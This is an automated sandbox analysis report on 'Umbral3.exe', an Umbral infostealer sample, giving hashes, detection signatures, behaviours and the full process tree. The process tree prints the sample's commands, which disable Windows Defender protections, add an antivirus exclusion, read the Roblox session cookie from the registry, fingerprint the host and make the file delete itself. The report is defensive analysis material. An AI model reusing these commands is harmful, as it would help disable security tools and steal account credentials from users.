Analysis
-
max time kernel
119s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
26-04-2024 13:10
Behavioral task
behavioral1
Sample
Umbral3.exe
Resource
win7-20240221-en
General
-
Target
Umbral3.exe
-
Size
229KB
-
MD5
7a902c87a60986f18a6b097712299256
-
SHA1
2c01906a39faa9d27a41e0d3cd84e92410b9c483
-
SHA256
e4e4f9045dc3683a2a69b9c7625f2ff46ed241ff64b47660a039dbc9d34cb0d5
-
SHA512
c8b75b3f0a77d1f84167af3c431e186802ccd5271fc4a361142e0209541de37f5d584d487bf5ea4b4d921e6e3846267fdea9f65cbd71001331bfea08de5425b6
-
SSDEEP
6144:tloZMCrIkd8g+EtXHkv/iD4DDUgoOJBiLHaIJtM34b8e1mmi:voZRL+EP8DDUgoOJBiLHaIJtMQI
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/memory/2932-0-0x00000000008C0000-0x0000000000900000-memory.dmp family_umbral behavioral1/memory/2932-2-0x000000001B180000-0x000000001B200000-memory.dmp family_umbral -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral3.exe -
Deletes itself 1 IoCs
pid Process 1920 cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 discord.com 9 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1724 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2800 PING.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2604 powershell.exe 3044 powershell.exe 2452 powershell.exe 1952 powershell.exe 2820 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2932 Umbral3.exe Token: SeDebugPrivilege 2604 powershell.exe Token: SeDebugPrivilege 3044 powershell.exe Token: SeDebugPrivilege 2452 powershell.exe Token: SeDebugPrivilege 1952 powershell.exe Token: SeIncreaseQuotaPrivilege 828 wmic.exe Token: SeSecurityPrivilege 828 wmic.exe Token: SeTakeOwnershipPrivilege 828 wmic.exe Token: SeLoadDriverPrivilege 828 wmic.exe Token: SeSystemProfilePrivilege 828 wmic.exe Token: SeSystemtimePrivilege 828 wmic.exe Token: SeProfSingleProcessPrivilege 828 wmic.exe Token: SeIncBasePriorityPrivilege 828 wmic.exe Token: SeCreatePagefilePrivilege 828 wmic.exe Token: SeBackupPrivilege 828 wmic.exe Token: SeRestorePrivilege 828 wmic.exe Token: SeShutdownPrivilege 828 wmic.exe Token: SeDebugPrivilege 828 wmic.exe Token: SeSystemEnvironmentPrivilege 828 wmic.exe Token: SeRemoteShutdownPrivilege 828 wmic.exe Token: SeUndockPrivilege 828 wmic.exe Token: SeManageVolumePrivilege 828 wmic.exe Token: 33 828 wmic.exe Token: 34 828 wmic.exe Token: 35 828 wmic.exe Token: SeIncreaseQuotaPrivilege 828 wmic.exe Token: SeSecurityPrivilege 828 wmic.exe Token: SeTakeOwnershipPrivilege 828 wmic.exe Token: SeLoadDriverPrivilege 828 wmic.exe Token: SeSystemProfilePrivilege 828 wmic.exe Token: SeSystemtimePrivilege 828 wmic.exe Token: SeProfSingleProcessPrivilege 828 wmic.exe Token: SeIncBasePriorityPrivilege 828 wmic.exe Token: SeCreatePagefilePrivilege 828 wmic.exe Token: SeBackupPrivilege 828 wmic.exe Token: SeRestorePrivilege 828 wmic.exe Token: SeShutdownPrivilege 828 wmic.exe Token: SeDebugPrivilege 828 wmic.exe Token: SeSystemEnvironmentPrivilege 828 wmic.exe Token: SeRemoteShutdownPrivilege 828 wmic.exe Token: SeUndockPrivilege 828 wmic.exe Token: SeManageVolumePrivilege 828 wmic.exe Token: 33 828 wmic.exe Token: 34 828 wmic.exe Token: 35 828 wmic.exe Token: SeIncreaseQuotaPrivilege 1536 wmic.exe Token: SeSecurityPrivilege 1536 wmic.exe Token: SeTakeOwnershipPrivilege 1536 wmic.exe Token: SeLoadDriverPrivilege 1536 wmic.exe Token: SeSystemProfilePrivilege 1536 wmic.exe Token: SeSystemtimePrivilege 1536 wmic.exe Token: SeProfSingleProcessPrivilege 1536 wmic.exe Token: SeIncBasePriorityPrivilege 1536 wmic.exe Token: SeCreatePagefilePrivilege 1536 wmic.exe Token: SeBackupPrivilege 1536 wmic.exe Token: SeRestorePrivilege 1536 wmic.exe Token: SeShutdownPrivilege 1536 wmic.exe Token: SeDebugPrivilege 1536 wmic.exe Token: SeSystemEnvironmentPrivilege 1536 wmic.exe Token: SeRemoteShutdownPrivilege 1536 wmic.exe Token: SeUndockPrivilege 1536 wmic.exe Token: SeManageVolumePrivilege 1536 wmic.exe Token: 33 1536 wmic.exe Token: 34 1536 wmic.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 2932 wrote to memory of 296 2932 Umbral3.exe 28 PID 2932 wrote to memory of 296 2932 Umbral3.exe 28 PID 2932 wrote to memory of 296 2932 Umbral3.exe 28 PID 2932 wrote to memory of 2604 2932 Umbral3.exe 30 PID 2932 wrote to memory of 2604 2932 Umbral3.exe 30 PID 2932 wrote to memory of 2604 2932 Umbral3.exe 30 PID 2932 wrote to memory of 3044 2932 Umbral3.exe 32 PID 2932 wrote to memory of 3044 2932 Umbral3.exe 32 PID 2932 wrote to memory of 3044 2932 Umbral3.exe 32 PID 2932 wrote to memory of 2452 2932 Umbral3.exe 34 PID 2932 wrote to memory of 2452 2932 Umbral3.exe 34 PID 2932 wrote to memory of 2452 2932 Umbral3.exe 34 PID 2932 wrote to memory of 1952 2932 Umbral3.exe 36 PID 2932 wrote to memory of 1952 2932 Umbral3.exe 36 PID 2932 wrote to memory of 1952 2932 Umbral3.exe 36 PID 2932 wrote to memory of 828 2932 Umbral3.exe 38 PID 2932 wrote to memory of 828 2932 Umbral3.exe 38 PID 2932 wrote to memory of 828 2932 Umbral3.exe 38 PID 2932 wrote to memory of 1536 2932 Umbral3.exe 41 PID 2932 wrote to memory of 1536 2932 Umbral3.exe 41 PID 2932 wrote to memory of 1536 2932 Umbral3.exe 41 PID 2932 wrote to memory of 2772 2932 Umbral3.exe 43 PID 2932 wrote to memory of 2772 2932 Umbral3.exe 43 PID 2932 wrote to memory of 2772 2932 Umbral3.exe 43 PID 2932 wrote to memory of 2820 2932 Umbral3.exe 45 PID 2932 wrote to memory of 2820 2932 Umbral3.exe 45 PID 2932 wrote to memory of 2820 2932 Umbral3.exe 45 PID 2932 wrote to memory of 1724 2932 Umbral3.exe 47 PID 2932 wrote to memory of 1724 2932 Umbral3.exe 47 PID 2932 wrote to memory of 1724 2932 Umbral3.exe 47 PID 2932 wrote to memory of 1920 2932 Umbral3.exe 49 PID 2932 wrote to memory of 1920 2932 Umbral3.exe 49 PID 2932 wrote to memory of 1920 2932 Umbral3.exe 49 PID 1920 wrote to memory of 2800 1920 cmd.exe 51 PID 1920 wrote to memory of 2800 1920 cmd.exe 51 PID 1920 wrote to memory of 2800 1920 cmd.exe 51 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 296 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"2⤵
- Views/modifies file attributes
PID:296
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:828
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1536
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:2772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2820
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1724
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\system32\PING.EXEping localhost3⤵
- Runs ping.exe
PID:2800
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD54c3dada670799e9495dd6c1b6e6814be
SHA1102d41dbc2ae9e1ceba8b3674d4ed7ce1093ea9d
SHA2564e5fb77e235bca233d56f18bae4d353d864fa70c74cb8403e059974a73b27f40
SHA5129e222c7efcba8858a324056f7e37a9b1d9cc893a4d35171718545a2de480376830f8ee14beb0efe28c811ff11d2a8c4b75348602e89e5a6d0ab1cc0a675a3c09